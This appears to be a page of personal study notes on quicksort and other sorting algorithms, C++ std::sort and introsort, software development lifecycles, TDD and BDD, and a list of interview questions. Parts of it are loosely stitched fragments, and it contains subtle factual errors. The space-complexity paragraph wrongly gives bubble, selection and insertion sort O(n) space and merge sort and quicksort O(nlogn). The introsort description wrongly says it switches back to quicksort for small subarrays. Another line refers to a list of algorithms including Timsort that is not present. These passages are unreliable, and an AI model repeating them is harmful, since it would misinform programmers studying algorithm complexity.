Quicksort is a popular sorting algorithm that uses a divide-and-conquer approach to sort a list of items. It works by selecting a pivot element from the list, partitioning the list into two sublists based on the pivot, and then recursively sorting the sublists. The time complexity of quicksort can vary depending on the implementation, but in general, it has an average-case time complexity of O(nlogn) and a worst-case time complexity of O(n^2).

The best-case time complexity of quicksort occurs when the pivot is chosen as the median element of the list. In this case, the algorithm will divide the list into two sublists of equal size, resulting in a balanced partition. This leads to a time complexity of O(nlogn), as the algorithm will make logn recursive calls, each of which takes O(n) time to partition the list.

In the average case, the time complexity of quicksort is also O(nlogn). This is because the pivot is chosen randomly, and in most cases, it will result in a balanced partition. However, there is a small chance that the pivot will be chosen as the minimum or maximum element, resulting in an unbalanced partition and a worst-case time complexity of O(n^2).

In the worst case, the time complexity of quicksort is O(n^2). This occurs when the pivot is consistently chosen as the minimum or maximum element, resulting in an unbalanced partition. In this case, the algorithm will make n recursive calls, each of which takes O(n) time to partition the list. This leads to a total time complexity of O(n^2).

Overall, the time complexity of quicksort is largely dependent on the choice of pivot element and the initial ordering of the list. In the average case, it has a relatively efficient time complexity of O(nlogn), but in the worst case, it can be as inefficient as O(n^2).

Below is a Python implementation just for fun. But how is it implemented in C++?

Quicksort is a popular sorting algorithm that follows the divide and conquer approach. It works by partitioning an array into two subarrays, one with elements smaller than a chosen pivot element and the other with elements larger than the pivot. The subarrays are then recursively sorted until the entire array is sorted.

Here is an implementation of quicksort in Python:

# function to perform quicksort
def quicksort(array):
    # base case: an array with 0 or 1 elements is already sorted
    if len(array) < 2:
        return array
    
    # choose a pivot element (can be any element from the array)
    pivot = array[0]
    
    # partition the array into two subarrays
    smaller = [i for i in array[1:] if i <= pivot]
    larger = [i for i in array[1:] if i > pivot]
    
    # recursively sort the subarrays
    smaller = quicksort(smaller)
    larger = quicksort(larger)
    
    # combine the sorted subarrays and the pivot element
    return smaller + [pivot] + larger

# example
arr = [5, 2, 8, 1, 9, 3]

print(quicksort(arr)) # output: [1, 2, 3, 5, 8, 9]

The time complexity of quicksort is O(nlogn) in the average case and O(n^2) in the worst case. The space complexity is O(logn) due to the recursive calls. 

std::sort uses Introsort

Introsort is a sorting algorithm that combines the efficiency of quicksort with the worst-case time complexity guarantee of heap sort. It was first introduced by David Musser in 1997.

The algorithm starts by using quicksort to partition the input array into smaller subarrays. However, to avoid the worst-case time complexity of quicksort (O(n^2)), Introsort switches to heap sort when the recursion depth exceeds a certain limit. This limit is usually set to log(n), where n is the number of elements in the array.

Heap sort is used because it guarantees a worst-case time complexity of O(nlogn) and is not affected by the initial ordering of the elements. Once the subarrays are small enough, the algorithm switches back to quicksort for efficient sorting.

Introsort also uses a median-of-three partitioning strategy to choose the pivot element for quicksort, which helps avoid the worst-case scenario when the input array is already sorted or nearly sorted.

Overall, Introsort combines the best features of both quicksort and heap sort to achieve efficient sorting with a worst-case time complexity of O(nlogn). It is commonly used in standard library implementations for sorting large data sets.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

Sorting algorithms are used to arrange a given set of data in a certain order, typically from least to greatest or vice versa. The complexity of a sorting algorithm refers to the amount of time or space it takes to sort a given set of data. The complexity of a sorting algorithm is typically measured in terms of time complexity and space complexity.

  1. Bubble Sort: Bubble sort is one of the simplest sorting algorithms and has a time complexity of O(n^2). This means that for a set of n elements, the algorithm will take n^2 operations to complete. It compares adjacent elements and swaps them if they are in the wrong order, making multiple passes through the data until it is sorted.

  2. Selection Sort: Selection sort also has a time complexity of O(n^2). It works by finding the smallest element in the unsorted portion of the data and swapping it with the first element in the unsorted portion. It continues to do this until the entire data is sorted.

  3. Insertion Sort: Similar to bubble and selection sort, insertion sort also has a time complexity of O(n^2). However, it is more efficient than the other two as it only swaps elements when necessary, rather than making multiple passes through the data.

  4. Merge Sort: Merge sort has a time complexity of O(nlogn), making it more efficient than the previous three sorting algorithms. It works by dividing the data into smaller sublists, sorting them, and then merging them back together in the correct order.

  5. Quick Sort: Quick sort also has a time complexity of O(nlogn). It works by selecting a pivot element and partitioning the data into two sublists, one with elements smaller than the pivot and one with elements larger than the pivot. It then recursively sorts each sublist until the entire data is sorted.

  6. Heap Sort: Heap sort has a time complexity of O(nlogn) as well. It works by building a heap data structure from the given data and repeatedly removing the root element, which is the largest element in the heap, and placing it at the end of the sorted list.

  7. Radix Sort: Radix sort has a time complexity of O(nk), where n is the number of elements and k is the number of digits in the largest element. It works by sorting the elements based on their digits, starting from the least significant digit to the most significant.

In terms of space complexity, all of the above sorting algorithms have a space complexity of O(n), except for merge sort and quick sort, which have a space complexity of O(nlogn) due to the need for additional memory for the recursive calls.

Overall, merge sort and quick sort are considered to be more efficient in terms of time complexity as they have a time complexity of O(nlogn). However, quick sort has a worst-case time complexity of O(n^2) if the pivot is not chosen properly, making merge sort a more reliable choice. Radix sort is also efficient in terms of time complexity, but it is limited to sorting numbers only. On the other hand, bubble, selection, and insertion sort are considered to be less efficient as they have a time complexity of O(n^2), but they require less additional memory, making them more suitable for small data sets.

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.

References

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.


The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

Stop doing the things that nobody wants

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit


OpenAI generated interview questions

  1. What is the difference between a compiler and an interpreter?

  2. Explain the concept of runtime complexity and how it affects algorithm efficiency.

  3. Can you give an example of a data structure and explain its use case?

  4. What is the difference between a stack and a queue?

  5. How do you handle memory management in programming languages?

  6. What is the difference between a pointer and a reference in C++?

  7. What is the difference between a shallow copy and a deep copy in C++?

  8. Can you explain the concept of inheritance in C++?

  9. How does polymorphism work in C++?

  10. What is the difference between pass by value and pass by reference in C++?